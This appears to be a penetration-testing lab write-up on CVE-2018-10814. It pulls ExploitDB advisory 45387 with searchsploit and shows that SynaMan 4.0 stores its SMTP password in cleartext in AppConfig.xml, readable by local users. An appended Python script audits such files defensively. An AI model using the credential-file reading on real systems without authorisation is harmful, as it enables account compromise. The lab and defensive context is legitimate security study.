CVE-2018-10814
The target SynaMan instance appears to be vulnerable to CVE-2018-10814 due to its outdated version, 4.0.
The version has not been confirmed, since the instance reports 2 different versions, but the vulnerability is still worth checking.
A vulnerability classified as critical has been found in Synametrics SynaMan 4.0 Build 1488. The issue affects unspecified processing in the Password Storage component, and the manipulation leads to a credentials management weakness. The vulnerability is identified as CVE-2018-10814. Local access is required to carry out the attack, and an exploit is available.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ searchsploit -m windows/webapps/45387.txt ; mv 45387.txt CVE-2018-10814.txt
Exploit: SynaMan 4.0 build 1488 - SMTP Credential Disclosure
URL: https://www.exploit-db.com/exploits/45387
Path: /usr/share/exploitdb/exploits/windows/webapps/45387.txt
Codes: CVE-2018-10814
Verified: False
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/fish/45387.txt
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ cat CVE-2018-10814.txt
# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
# Version: 4.0 build 1488
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Tested On: Windows 7 x86
Description
-----------------------------------------------------------------
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
Prerequisites
-----------------------------------------------------------------
Access to a system running Synaman 4 using a low-privileged user account
Proof of Concept
-----------------------------------------------------------------
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.
C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
<parameters>
<parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
<parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
<parameter name="smtpSecurity" type="1" value="None"></parameter>
**truncated**
<parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
</parameters>
</Configuration>
Timeline
---------------------------------------------------------------------
05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure
Exploit locally available
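A defensive check for the weakness described in the advisory above, added here as an example (it is not part of the original notes or of the exploit author's text): it parses a file in the AppConfig.xml layout and flags credential-like parameters stored with a non-empty cleartext value, reporting only the value's length. The sample XML, the name pattern and the function names are assumptions constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the AppConfig.xml layout shown in the advisory above
# (all values are made up for this example).
SAMPLE_APPCONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@example.test"></parameter>
<parameter name="smtpSecurity" type="1" value="None"></parameter>
<parameter name="smtpPassword" type="1" value="ConstructedSecret1"></parameter>
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
</parameters>
</Configuration>"""

# Assumption: parameter names containing these words hold credentials.
SECRET_NAME = re.compile(r"pass|secret|token|apikey", re.IGNORECASE)


def find_cleartext_secrets(xml_text):
    """Return (name, value_length) for secret-looking parameters with a value.

    Only the length is reported so the audit output does not itself
    leak the credential.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for param in root.iter("parameter"):
        name = param.get("name", "")
        value = param.get("value", "")
        if SECRET_NAME.search(name) and value:
            findings.append((name, len(value)))
    return findings


def audit(xml_text):
    """Format findings as report lines; an empty list means nothing flagged."""
    return [
        f"cleartext credential in parameter '{name}' ({length} chars): "
        "rotate it and restrict read access to the file"
        for name, length in find_cleartext_secrets(xml_text)
    ]


if __name__ == "__main__":
    for line in audit(SAMPLE_APPCONFIG):
        print(line)
```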